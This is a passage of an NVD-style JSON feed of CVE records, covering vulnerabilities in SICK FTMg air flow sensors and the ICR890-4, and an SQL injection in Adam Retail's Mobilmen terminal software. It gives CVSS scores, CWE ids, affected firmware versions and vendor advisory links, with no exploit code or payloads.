E-287"}]}],"configurations":[{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esd20axx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"E3882685-8678-47E4-995C-C3F6D9AD5668"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esd20axx:-:*:*:*:*:*:*:*","matchCriteriaId":"16AD808F-900B-41EE-B90A-F9D67AAAD6BE"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esd25axx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"49D930E8-415C-4183-87A1-8D7F44247B67"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esd25axx:-:*:*:*:*:*:*:*","matchCriteriaId":"24618A95-328C-47C9-B8EF-B4DF6E65D68E"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esn40sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"1DCC9C0B-7CCE-44E5-B25D-67BF971B4541"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esn40sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"290B016B-20B7-40C1-B825-6ED4774C4861"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esn50sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"E23D6018-1DFB-4516-82C9-3A3B09C2CBF9"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esn50sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"1B113D9E-8E61-4F9C-9E5B-2030EEFB133B"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esr50sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"77F2683F-B1B5-4033-97D4-ADF77B6B50E8"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esr50sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"A02547D3-5E40-41B3-A7B4-D63F60A5F80B"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esr40sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"9075A02A-C627-43DA-ACF7-776197B518C5"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esr40sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"7B887993-18A8-493F-97A1-A788FBD5A5B9"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esd15axx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"E9219CD8-34CE-45A2-904A-E7B1740706C2"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esd15axx:-:*:*:*:*:*:*:*","matchCriteriaId":"FF162AA9-6645-4032-8D29-BAE2D60FBD9B"}]}]}],"references":[{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.json","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.pdf","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/psirt","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.json","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.pdf","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/psirt","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2023-31409","sourceIdentifier":"psirt@sick.de","published":"2023-05-15T11:15:09.550","lastModified":"2026-06-01T13:16:23.757","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Uncontrolled Resource Consumption in SICK FTMg AIR FLOW SENSOR with Partnumbers 1100214, 1100215, 1100216, 1120114, 1120116, 1122524, 1122526 allows an remote attacker to influence the availability of the webserver by invocing a Slowloris style attack via HTTP requests."}],"metrics":{"cvssMetricV31":[{"source":"psirt@sick.de","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"LOW"},"exploitabilityScore":3.9,"impactScore":1.4},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":3.6}]},"weaknesses":[{"source":"psirt@sick.de","type":"Secondary","description":[{"lang":"en","value":"CWE-400"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-400"}]}],"configurations":[{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esd20axx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"E3882685-8678-47E4-995C-C3F6D9AD5668"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esd20axx:-:*:*:*:*:*:*:*","matchCriteriaId":"16AD808F-900B-41EE-B90A-F9D67AAAD6BE"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esd25axx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"49D930E8-415C-4183-87A1-8D7F44247B67"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esd25axx:-:*:*:*:*:*:*:*","matchCriteriaId":"24618A95-328C-47C9-B8EF-B4DF6E65D68E"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esn40sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"1DCC9C0B-7CCE-44E5-B25D-67BF971B4541"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esn40sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"290B016B-20B7-40C1-B825-6ED4774C4861"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esn50sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"E23D6018-1DFB-4516-82C9-3A3B09C2CBF9"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esn50sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"1B113D9E-8E61-4F9C-9E5B-2030EEFB133B"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esr50sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"77F2683F-B1B5-4033-97D4-ADF77B6B50E8"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esr50sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"A02547D3-5E40-41B3-A7B4-D63F60A5F80B"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esr40sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"9075A02A-C627-43DA-ACF7-776197B518C5"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esr40sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"7B887993-18A8-493F-97A1-A788FBD5A5B9"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esd15axx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"E9219CD8-34CE-45A2-904A-E7B1740706C2"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esd15axx:-:*:*:*:*:*:*:*","matchCriteriaId":"FF162AA9-6645-4032-8D29-BAE2D60FBD9B"}]}]}],"references":[{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.json","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.pdf","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/psirt","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.json","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.pdf","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/psirt","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2023-1508","sourceIdentifier":"iletisim@usom.gov.tr","published":"2023-05-23T21:15:08.967","lastModified":"2026-06-01T13:16:22.477","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Adam Retail Automation Systems Mobilmen Terminal Software allows SQL Injection.\n\nThis issue affects Mobilmen Terminal Software: before 3."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-89"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:adampos:mobilmen_el_terminali_yazilimi:*:*:*:*:*:*:*:*","versionEndExcluding":"3","matchCriteriaId":"48EB8DC9-8685-41FC-9A00-98AEA1F55F73"}]}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0284","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0284","source":"iletisim@usom.gov.tr","tags":["Third Party Advisory"]},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0284","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Third Party Advisory"]}]}},{"cve":{"id":"CVE-2023-35696","sourceIdentifier":"psirt@sick.de","published":"2023-07-10T16:15:52.800","lastModified":"2026-06-01T13:16:23.897","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Unauthenticated endpoints in the SICK ICR890-4 could allow an unauthenticated\nremote attacker to retrieve sensitive information about the device via HTTP requests."}],"metrics":{"cvssMetricV31":[{"source":"psirt@sick.de","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":3.6},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":3.6}]},"weaknesses":[{"source":"psirt@sick.de","type":"Secondary","description":[{"lang":"en","value":"CWE-668"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-668"}]}],"configurations":[{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:icr890-4_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.5.0","matchCriteriaId":"C9781FA2-2446-4587-8BBA-1AC342BC5A0F"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:icr890-4:-:*:*:*:*:*:*:*","matchCriteriaId":"8E1AF1D7-8380-4B5C-8258-214F00638CC2"}]}]}],"references":[{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.json","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.pdf","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/psirt","source":"psirt@sick.de","tags":["Product"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.json","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.pdf","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/psirt","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Product"]}]}},{"cve":{"id":"CVE-2023-35697","sourceIdentifier":"psirt@sick.de","published":"2023-07-10T16:15:52.877","lastModified":"2026-06-01T13:16:24.033","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Restriction of Excessive Authentication Attempts in the SICK ICR890-4\ncould allow a remote attacker to brute-force user credentials."}],"metrics":{"cvssMetricV31":[{"source":"psirt@sick.de","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":1.4},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":3.6}]},"weaknesses":[{"source":"psirt@sick.de","type":"Secondary","description":[{"lang":"en","value":"CWE-307"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-307"}]}],"configurations":[{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:icr890-4_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.5.0","matchCriteriaId":"C9781FA2-2446-4587-8BBA-1AC342BC5A0F"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:icr890-4:-:*:*:*:*:*:*:*","matchCriteriaId":"8E1AF1D7-8380-4B5C-8258-214F00638CC2"}]}]}],"references":[{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.json","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.pdf","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/psirt","source":"psirt@sick.de","tags":["Product"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.json","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.pdf","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/psirt","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Product"]}]}},{"cve":{"id":"CVE-2023-35698","sourceIdentifier":"psirt@sick.de","published":"2023-07-10T16:15:52.937","lastModified":"2026-06-01T13:16:24.160","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Observable Response Discrepancy in the SICK ICR890-4 could allow a remote attacker to identify valid usernames for the FTP server from the response given during a failed login\nattempt."}],"metrics":{"cvssMetricV31":[{"source":"psirt@sick.de","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":1.4},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":1.4}]},"weaknesses":[{"source":"psirt@sick.de","type":"Secondary","description":[{"lang":"en","value":"CWE-204"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-203"}]}],"configurations":[{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:icr890-4_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.5.0","matchCriteriaId":"C9781FA2-2446-4587-8BBA-1AC342BC5A0F"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:icr890-4:-:*:*:*:*:*:*:*","matchCriteriaId":"8E1AF1D7-8380-4B5C-8258-214F00638CC2"}]}]}],"references":[{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.json","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.pdf","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/psirt","source":"psirt@sick.de","tags":["Product"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.json","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.pdf","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/psirt","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Product"]}]}},{"cve":{"id":"CVE-2023-35699","sourceIdentifier":"psirt@sick.de","published":"2023-07-10T16:15:52.993","lastModified":"2026-06-01T13:16:24.283","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Cleartext Storage on Disk in the SICK ICR890-4 could allow an unauthenticated attacker with local access to the device to disclose sensitive information by accessing a SD card."}],"metrics":{"cvssMetricV31":[{"source":"psirt@sick.de","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"PHYSICAL","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":0.9,"impactScore":4.0},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":4.6,"baseSeverity":"MEDIUM","attackVector":"PHYSICAL","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":0.9,"impactScore":3.6}]},"weaknesses":[{"source":"psirt@sick.de","type":"Secondary","description":[{"lang":"en","value":"CWE-313"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-312"}]}],"configurations":[{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:icr890-4_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.5.0","matchCriteriaId":"C9781FA2-2446-4587-8BBA-1AC342BC5A0F"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:icr890-4:-:*:*:*:*:*:*:*","matchCriteriaId":"8E1AF1D7-8380-4B5C-8258-214F00638CC2"}]}]}],"references":[{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.json","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.pdf","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/psirt","source":"psirt@sick.de","tags":["Product"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.json","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.pdf","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/psirt","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Product"]}]}},{"cve":{"id":"CVE-2023-3271","sourceIdentifier":"psirt@sick.de","published":"2023-07-10T16:15:55.443","lastModified":"2026-06-01T13:16:24.463","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Access Control in the SICK ICR890-4 could allow an unauthenticated remote attacker to gather information about the system and download data via the REST API by accessing\nunauthenticated endpoints."}],"metrics":{"cvssMetricV31":[{"source":"psirt@sick.de","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L","baseScore":8.2,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"LOW"},"exploitabilityScore":3.9,"impactScore":4.2},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":3.6}]},"weaknesses":[{"source":"psirt@sick.de","type":"Secondary","description":[{"lang":"en","value":"CWE-284"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"NVD-CWE-noinfo"}]}],"configurations":[{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:icr890-4_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.5.0","matchCriteriaId":"C9781FA2-2446-4587-8BBA-1AC342BC5A0F"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:icr890-4:-:*:*:*:*:*:*:*","matchCriteriaId":"8E1AF1D7-8380-4B5C-8258-214F00638CC2"}]}]}],"references":[{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.json","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.pdf","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/psirt","source":"psirt@sick.de","tags":["Product"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.json","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.pdf","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/psirt","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Product"]}]}},{"cve":{"id":"CVE-2023-3272","sourceIdentifier":"psirt@sick.de","published":"2023-07-10T16:15:55.507","lastModified":"2026-06-01T13:16:24.587","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Cleartext Transmission of Sensitive Information in the SICK ICR890-4 could allow a\nremote attacker to gather sensitive information by intercepting network traffic that is not encrypted."}],"metrics":{"cvssMetricV31":[{"source":"psirt@sick.de","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":3.6},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":3.6}]},"weaknesses":[{"source":"psirt@sick.de","type":"Secondary","description":[{"lang":"en","value":"CWE-319"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-319"}]}],"configurations":[{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:icr890-4_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.5.0","matchCriteriaId":"C9781FA2-2446-4587-8BBA-1AC342BC5A0F"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:icr890-4:-:*:*:*:*:*:*:*","matchCriteriaId":"8E1AF1D7-8380-4B5C-8258-214F00638CC2"}]}]}],"references":[{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.json","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.pdf","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/psirt","source":"psirt@sick.de","tags":["Product"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.json","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.pdf","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor 